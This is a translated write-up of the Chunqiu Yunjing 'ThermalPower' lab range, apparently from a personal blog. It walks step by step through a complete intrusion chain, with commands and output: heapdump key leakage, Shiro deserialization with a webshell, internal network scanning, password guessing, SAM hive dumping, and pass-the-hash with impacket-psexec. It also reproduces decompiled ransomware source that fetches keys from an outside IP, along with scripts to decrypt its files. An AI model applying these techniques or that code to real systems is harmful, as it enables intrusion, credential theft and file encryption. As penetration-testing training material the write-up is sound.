春秋云镜 (Chunqiu Yunjing) - ThermalPower

This article was last updated in the early hours of 24 July 2025.

Heapdump memory information disclosure, Shiro deserialization, registry SAM dump, .NET reverse engineering

Information gathering

fscan

The scan found two results.

dirsearch

Directory scan.

A heapdump endpoint was found.

Heapdump memory disclosure

Download it and read it:

ubuntu@VM-4-7-ubuntu:~$ java -jar heapdump_tool.jar heapdump
[-] file: heapdump
[-] Start jhat, waiting...
[-] fing object count: 86326
[-] too many object,please input 0/1 to choose mode.
0. (search data, may can't find some data, can't use function num=,len=,getip,geturl,getfile).
1. (load all object, need wait a few minutes).
> 0
[-] please input keyword value to search, example: password,re=xxx,len=16,num=0-10,id=0x123a,class=org.xx,all=true,geturl,getfile,getip,shirokey,systemproperties,allproperties,hashtable input q/quit to quit.
> shirokey
>> QZYysjAYhG6/sDKQlVpR2g==
[-] please input keyword value to search, example: password,re=xxx,len=16,num=0-10,id=0x123a,class=org.xx,all=true,geturl,getfile,getip,shirokey,systemproperties,allproperties,hashtable input q/quit to quit.
>

Got the key: QZYysjAYhG6/sDKQlVpR2g==

Shiro deserialization

Tried AntSword (蚁剑) and Behinder (冰蝎); both injected successfully but could not connect. In the end it had to be Godzilla (哥斯拉).

flag01 was found in the root directory:

flag01: flag{759069eb-46b7-4905-b6c6-bf95f66233c7}

Internal network information gathering

Upload fscan to scan the internal network; the local host is 172.22.17.213.

/ >/bin/sh -c "cd /tmp && ./FScan_2.0.1_linux_x64 -h 172.22.17.213/24" 
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1

[1.9s] 已选择服务扫描模式
[1.9s] 开始信息扫描
[1.9s] CIDR范围: 172.22.17.0-172.22.17.255
[1.9s] generate_ip_range_full
[1.9s] 解析CIDR 172.22.17.213/24 -> IP范围 172.22.17.0-172.22.17.255
[1.9s] 最终有效主机数量: 256
[1.9s] 开始主机扫描
[1.9s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.9s] [*] 目标 172.22.17.213 存活 (ICMP)
[1.9s] [*] 目标 172.22.17.6 存活 (ICMP)
[4.9s] 存活主机数量: 2
[4.9s] 有效端口数量: 233
[4.9s] [*] 端口开放 172.22.17.213:22
[4.9s] [*] 端口开放 172.22.17.213:8080
[4.9s] [*] 端口开放 172.22.17.6:445
[4.9s] [*] 端口开放 172.22.17.6:139
[4.9s] [*] 端口开放 172.22.17.6:135
[4.9s] [*] 端口开放 172.22.17.6:21
[4.9s] [*] 端口开放 172.22.17.6:80
[6.0s] 扫描完成, 发现 7 个开放端口
[6.0s] 存活端口数量: 7
[6.0s] 开始漏洞扫描
[6.1s] POC加载完成: 总共387个,成功387个,失败0个
[6.1s] [+] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER
[6.1s] [*] NetInfo 扫描结果
目标主机: 172.22.17.6
主机名: WIN-ENGINEER
发现的网络接口:
IPv4地址:
└─ 172.22.17.6
[6.2s] [*] 网站标题 http://172.22.17.6 状态码:200 长度:661 标题:172.22.17.6 - /
[6.2s] [+] FTP服务 172.22.17.6:21 匿名登录成功!
[6.3s] [*] 网站标题 http://172.22.17.213:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.17.213:8080/login;jsessionid=AB5C64F629CA583DECFC46E1201AAD54
[6.4s] [*] 网站标题 http://172.22.17.213:8080/login;jsessionid=AB5C64F629CA583DECFC46E1201AAD54 状态码:200 长度:2936 标题:火创能源监控画面管理平台
[7.9s] [+] 目标: http://172.22.17.213:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息:
参考链接:https://github.com/LandGrey/SpringBootVulExploit
[43.5s] 扫描已完成: 12/12

Discovered:

172.22.17.6		WIN-ENGINEER

frp traffic forwarding

Obtained internal documents:

WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3

1. Login permission restrictions:
To ensure the security of the information system, effective immediately, logins to all engineers' PCs in the company will be controlled by the SCADA engineer. Engineers are reminded that access is only permitted through the login method provided by the SCADA engineer.
2. Login account settings:
For ease of management and standardization, login account names use the full name in lowercase pinyin. For example, Zhang San's account name is zhangsan and his employee number is 0801. The initial password is made up of account name + @ + employee number, for example zhangsan@0801.

Extract the SCADA engineers' details; the login usernames and passwords are inferred to be:

chenhua/chenhua@0813
zhaoli/zhaoli@0821
wangning/wangning@0837
zhangling/zhangling@0871
zhangying/zhangying@0888
wangzhiqiang/wangzhiqiang@0901
chentao/chentao@0922
zhouyong/zhouyong@0939
lilong/lilong@1046
liyumei/liyumei@1048

Test the SMB login:

proxychains -q crackmapexec smb 172.22.17.6 -u chenhua -p 'chenhua@0813'

Registry SAM dump

RDP connection works, but there is no permission to access Administrator, so privilege escalation is needed.

Check all the information in the current access token, including the current username, security identifier (SID), privileges, and the groups the current user belongs to.

Export the SAM hive files from an administrator-mode prompt:

reg save hklm\sam C:\Users\chenhua\Desktop\sam
reg save hklm\system C:\Users\chenhua\Desktop\system

Copy them out and extract the hashes:

python secretsdumps.py -sam sam -system system LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x6c2be46aaccdf65a9b7be2941d6e7759
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f82292b7ac79b05d5b0e3d302bd0d279:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a2fa2853651307ab9936cc95c0e0acf5:::
chentao:1000:aad3b435b51404eeaad3b435b51404ee:47466010c82da0b75328192959da3658:::
zhaoli:1001:aad3b435b51404eeaad3b435b51404ee:2b83822caab67ef07b614d05fd72e215:::
wangning:1002:aad3b435b51404eeaad3b435b51404ee:3c52d89c176321511ec686d6c05770e3:::
zhangling:1003:aad3b435b51404eeaad3b435b51404ee:8349a4c5dd1bdcbc5a14333dd13d9f81:::
zhangying:1004:aad3b435b51404eeaad3b435b51404ee:8497fa5480a163cb7817f23a8525be7d:::
lilong:1005:aad3b435b51404eeaad3b435b51404ee:c3612c48cf829d1149f7a4e3ef4acb8a:::
liyumei:1006:aad3b435b51404eeaad3b435b51404ee:63ddcde0fa219c75e48e2cba6ea8c471:::
wangzhiqiang:1007:aad3b435b51404eeaad3b435b51404ee:5a661f54da156dc93a5b546ea143ea07:::
zhouyong:1008:aad3b435b51404eeaad3b435b51404ee:5d49bf647380720b9f6a15dbc3ffe432:::
chenhua:1009:aad3b435b51404eeaad3b435b51404ee:07ff24422b538b97f3c297cc8ddc7615:::
[*] Cleaning up...

Got the Administrator hash:

proxychains -q impacket-psexec Administrator@172.22.17.6 -hashes 0:f82292b7ac79b05d5b0e3d302bd0d279

flag02: flag{27680433-4467-467a-96fd-6ca09258cef8}

RDP connection

Scanning 172.22.26.0/24 with fscan successfully returned results:

/ >/bin/sh -c "cd /tmp && ./FScan_2.0.1_linux_x64 -h 172.22.26.0/24" 
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1

[1.8s] 已选择服务扫描模式
[1.8s] 开始信息扫描
[1.8s] CIDR范围: 172.22.26.0-172.22.26.255
[1.8s] generate_ip_range_full
[1.8s] 解析CIDR 172.22.26.0/24 -> IP范围 172.22.26.0-172.22.26.255
[1.8s] 最终有效主机数量: 256
[1.8s] 开始主机扫描
[1.8s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.8s] [*] 目标 172.22.26.11 存活 (ICMP)
[4.8s] 存活主机数量: 1
[4.8s] 有效端口数量: 233
[4.8s] [*] 端口开放 172.22.26.11:135
[4.8s] [*] 端口开放 172.22.26.11:1433
[4.8s] [*] 端口开放 172.22.26.11:80
[4.8s] [*] 端口开放 172.22.26.11:445
[4.8s] [*] 端口开放 172.22.26.11:139
[4.8s] 扫描完成, 发现 5 个开放端口
[4.8s] 存活端口数量: 5
[4.8s] 开始漏洞扫描
[4.8s] [*] NetInfo 扫描结果
目标主机: 172.22.26.11
主机名: WIN-SCADA
发现的网络接口:
IPv4地址:
└─ 172.22.26.11
[4.8s] [+] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[4.8s] POC加载完成: 总共387个,成功387个,失败0个
[4.8s] [+] MSSQL 172.22.26.11:1433 sa 123456
[5.2s] [*] 网站标题 http://172.22.26.11 状态码:200 长度:703 标题:IIS Windows Server
[5.6s] 扫描已完成: 9/9

Information obtained:

172.22.26.11    WORKGROUP\WIN-SCADA 

RDP connection:

Administrator:IYnT3GyCiy3

This lands in a control system; turning on the boiler yields the flag:

flag{bcd080d5-2cf1-4095-ac15-fa4bef9ca1c0}

.NET reverse engineering: decrypting RSA/AES

On the desktop there is a file titled 如何解密你的文件 (How to decrypt your files), obviously ransomware, and next to it an encrypted ScadaDB.sql.locky.

The ransomware program Lockyou.exe was found on the C: drive; inspection shows it is C#. The main encryption logic:

using System;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Text;

namespace Lockyou.LockyCore
{
    // Token: 0x02000004 RID: 4
    public class AESCrypto
    {
        // Token: 0x0600000C RID: 12 RVA: 0x00002280 File Offset: 0x00000480
        // The RSA private key and the RSA-encrypted AES key are both fetched from the backend.
        public AESCrypto()
        {
            this.BACKEND_URL = "http://39.101.170.47/";
            this.PRIVATE_KEY = this.GetHttpContent(this.BACKEND_URL + "privateKey");
            this.AES_KEY_ENC = this.GetHttpContent(this.BACKEND_URL + "encryptedAesKey");
            this.AES_KEY = this.DecryptRSA(this.AES_KEY_ENC, this.PRIVATE_KEY);
        }

        // Token: 0x0600000D RID: 13 RVA: 0x000023E4 File Offset: 0x000005E4
        private string GetHttpContent(string url)
        {
            HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(url);
            httpWebRequest.Method = "GET";
            httpWebRequest.ContentType = "application/x-www-form-urlencoded";
            string str = Convert.ToBase64String(Encoding.ASCII.GetBytes("C2bAseUs2r:C@PsasR2"));
            httpWebRequest.Headers[HttpRequestHeader.Authorization] = "Basic " + str;
            HttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse();
            string result;
            using (StreamReader streamReader = new StreamReader(httpWebResponse.GetResponseStream()))
            {
                result = streamReader.ReadToEnd();
            }
            return result;
        }

        // Token: 0x0600000E RID: 14 RVA: 0x00002484 File Offset: 0x00000684
        // fOAEP == false, so the AES key is wrapped with PKCS#1 v1.5 padding.
        private byte[] DecryptRSA(string encryptedData, string privateKey)
        {
            byte[] result;
            using (RSACryptoServiceProvider rsacryptoServiceProvider = new RSACryptoServiceProvider())
            {
                rsacryptoServiceProvider.FromXmlString(privateKey);
                byte[] rgb = Convert.FromBase64String(encryptedData);
                result = rsacryptoServiceProvider.Decrypt(rgb, false);
            }
            return result;
        }

        // Token: 0x0600000F RID: 15 RVA: 0x000024D0 File Offset: 0x000006D0
        public int EncryptFileStart(string insureKey)
        {
            MD5 md = new MD5CryptoServiceProvider();
            StringBuilder stringBuilder = new StringBuilder();
            byte[] array = md.ComputeHash(Encoding.Default.GetBytes(insureKey));
            for (int i = 0; i < array.Length; i++)
            {
                stringBuilder.Append(array[i].ToString("x2"));
            }
            bool flag = stringBuilder.ToString() != "7a2ca8a306260205c1cd46dad0fbd598";
            int result;
            if (flag)
            {
                Console.WriteLine("Incorrect insurance key!");
                result = 0;
            }
            else
            {
                int num = 0;
                foreach (string searchPattern in this.FILE_TYPES)
                {
                    string[] files = Directory.GetFiles(this.DESKTOP_PATH, searchPattern);
                    foreach (string text in files)
                    {
                        this.EncryptFile(text, text + ".locky");
                        num++;
                    }
                }
                result = num;
            }
            return result;
        }

        // Token: 0x06000010 RID: 16 RVA: 0x000025D0 File Offset: 0x000007D0
        // AesCryptoServiceProvider defaults: CBC mode, PKCS7 padding. The random IV is
        // written unencrypted as the first 16 bytes of the .locky file, followed by the ciphertext.
        private void EncryptFile(string inputFile, string outputFile)
        {
            using (AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider())
            {
                aesCryptoServiceProvider.Key = this.AES_KEY;
                aesCryptoServiceProvider.GenerateIV();
                using (ICryptoTransform cryptoTransform = aesCryptoServiceProvider.CreateEncryptor())
                {
                    using (FileStream fileStream = new FileStream(inputFile, FileMode.Open))
                    {
                        using (FileStream fileStream2 = new FileStream(outputFile, FileMode.Create))
                        {
                            using (CryptoStream cryptoStream = new CryptoStream(fileStream2, cryptoTransform, CryptoStreamMode.Write))
                            {
                                fileStream2.Write(aesCryptoServiceProvider.IV, 0, aesCryptoServiceProvider.IV.Length);
                                fileStream.CopyTo(cryptoStream);
                            }
                        }
                    }
                }
            }
            File.Delete(inputFile);
        }

        // Token: 0x04000007 RID: 7
        private string BACKEND_URL;

        // Token: 0x04000008 RID: 8
        private string PRIVATE_KEY;

        // Token: 0x04000009 RID: 9
        private string AES_KEY_ENC;

        // Token: 0x0400000A RID: 10
        private byte[] AES_KEY;

        // Token: 0x0400000B RID: 11
        private string DESKTOP_PATH = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory);

        // Token: 0x0400000C RID: 12
        private string[] FILE_TYPES = new string[]
        {
            "*.txt",
            "*.xlsx",
            "*.jpg",
            "*.png",
            "*.gif",
            "*.pdf",
            "*.mp4",
            "*.wav",
            "*.mp3",
            "*.bak",
            "*.docx",
            "*.pptx",
            "*.gif",
            "*.zip",
            "*.csv",
            "*.sql",
            "*.ini",
            "*.html",
            "*.php",
            "*.js",
            "*.css",
            "*.py",
            "*.cs",
            "*.cpp",
            "*.c"
        };
    }
}

Combining this with the attachment, write the decryption script:

from Crypto.Cipher import AES, PKCS1_v1_5
from Crypto.PublicKey import RSA
from Crypto.Util.Padding import unpad
import base64
import xml.etree.ElementTree as ET

AES_KEY_ENC_B64 = "lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g="

RSA_KEY_XML = """<RSAKeyValue><Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus><Exponent>AQAB</Exponent><P>2RPqaofcJ/phIp3QFCEyi0kj0FZRQmmWmiAmg/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==</P><Q>2/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbkVfy5Fw==</Q><DP>ulK51o6ejUH/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e/na0Q//FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==</DP><DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==</DQ><InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==</InverseQ><D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D></RSAKeyValue>""" # the XML RSA key from the attachment

# 3. Path of the encrypted file
ENCRYPTED_FILE = "ScadaDB.sql.locky"

# 4. Output path for the decrypted file
DECRYPTED_OUTPUT = "ScadaDB.sql"
# --------------------------------------------------

# Convert the .NET XML key into an RSA private key object
def rsa_key_from_xml(xml_str):
    tree = ET.fromstring(xml_str)
    def b64(tag):
        return int.from_bytes(base64.b64decode(tree.find(tag).text), 'big')
    n = b64('Modulus')
    e = b64('Exponent')
    d = b64('D')
    p = b64('P')
    q = b64('Q')
    return RSA.construct((n, e, d, p, q))

# Decrypt the AES key (Decrypt(..., false) in the sample means PKCS#1 v1.5, not OAEP)
def decrypt_aes_key(enc_b64, rsa_key):
    cipher_rsa = PKCS1_v1_5.new(rsa_key)
    enc_bytes = base64.b64decode(enc_b64)
    # Sentinel: returned instead of raising if the padding check fails
    sentinel = b""
    aes_key = cipher_rsa.decrypt(enc_bytes, sentinel)
    if aes_key == sentinel:
        raise ValueError("RSA decryption failed: wrong key or bad padding")
    return aes_key

# Decrypt a .locky file: the first 16 bytes are the IV, the rest is AES-CBC ciphertext
def decrypt_locky_file(enc_file, out_file, aes_key):
    with open(enc_file, 'rb') as f:
        iv = f.read(16)
        ciphertext = f.read()
    cipher = AES.new(aes_key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(ciphertext)
    # Strip PKCS#7 padding, raising if it is malformed instead of silently truncating
    decrypted = unpad(decrypted, AES.block_size)
    with open(out_file, 'wb') as f:
        f.write(decrypted)
    print(f"[+] Decryption complete: {out_file}")

rsa_key = rsa_key_from_xml(RSA_KEY_XML)
aes_key = decrypt_aes_key(AES_KEY_ENC_B64, rsa_key)

print(f"[+] Recovered AES key: {aes_key.hex()}")
decrypt_locky_file(ENCRYPTED_FILE, DECRYPTED_OUTPUT, aes_key)
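As an added example (not the writeup's own script), the same AES key recovery done with the standard library alone, using the XML key and the encrypted AES key from the attachment above: it first checks that the dumped RSA key's fields are consistent with each other, then does the RSA step by hand and validates the PKCS#1 v1.5 padding instead of relying on a sentinel, so a corrupted copy of the key or ciphertext fails loudly rather than producing garbage.

```python
# Added example: stdlib-only recovery of the Lockyou AES key from the leaked RSA XML key.
import base64
import math
import xml.etree.ElementTree as ET

# Values copied from the writeup's attachment (served by the sample's backend).
RSA_KEY_XML = "<RSAKeyValue><Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus><Exponent>AQAB</Exponent><P>2RPqaofcJ/phIp3QFCEyi0kj0FZRQmmWmiAmg/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==</P><Q>2/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbkVfy5Fw==</Q><DP>ulK51o6ejUH/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e/na0Q//FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==</DP><DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==</DQ><InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==</InverseQ><D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D></RSAKeyValue>"
AES_KEY_ENC_B64 = "lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g="

def parse_rsa_xml(xml_str):
    """Return the .NET RSAKeyValue fields (big-endian base64) as integers."""
    root = ET.fromstring(xml_str)
    def field(tag):
        return int.from_bytes(base64.b64decode(root.find(tag).text), "big")
    return {t: field(t) for t in ("Modulus", "Exponent", "D", "P", "Q")}

def check_rsa_key(key):
    """Sanity-check a key pulled from a dump: n == p*q and e*d == 1 mod lcm(p-1, q-1)."""
    n, e, d, p, q = (key[t] for t in ("Modulus", "Exponent", "D", "P", "Q"))
    lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)
    return n == p * q and (e * d) % lam == 1

def rsa_decrypt_pkcs1_v15(key, ciphertext):
    """RSA with the private exponent, then strip PKCS#1 v1.5 block type 2 padding,
    which is what RSACryptoServiceProvider.Decrypt(data, false) produces (no OAEP)."""
    n, d = key["Modulus"], key["D"]
    k = (n.bit_length() + 7) // 8
    if len(ciphertext) != k:
        raise ValueError("ciphertext length does not match the modulus size")
    em = pow(int.from_bytes(ciphertext, "big"), d, n).to_bytes(k, "big")
    if em[0] != 0x00 or em[1] != 0x02:
        raise ValueError("bad PKCS#1 v1.5 block type")
    sep = em.find(b"\x00", 2)
    if sep < 10:  # at least 8 non-zero padding bytes; -1 means no separator at all
        raise ValueError("bad PKCS#1 v1.5 padding")
    return em[sep + 1:]

def recover_aes_key():
    """Parse, validate and use the key; reject anything that is not an AES key."""
    key = parse_rsa_xml(RSA_KEY_XML)
    if not check_rsa_key(key):
        raise ValueError("RSA key fields are inconsistent (corrupted copy?)")
    aes_key = rsa_decrypt_pkcs1_v15(key, base64.b64decode(AES_KEY_ENC_B64))
    if len(aes_key) not in (16, 24, 32):
        raise ValueError("recovered value is not a valid AES key length")
    return aes_key

if __name__ == "__main__":
    print("[+] AES key:", recover_aes_key().hex())
```

The recovered bytes are the key to feed into the AES-CBC step of the script above; the IV is not secret and is read from the first 16 bytes of each .locky file.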

After decryption, flag04 is found in the SQL file:

flag{63cd8cd5-151f-4f29-bdc7-f80312888158}

春秋云镜 (Chunqiu Yunjing) - ThermalPower
http://example.com/2025/07/23/春秋云镜-ThermalPower/
Author: butt3rf1y
Published: 23 July 2025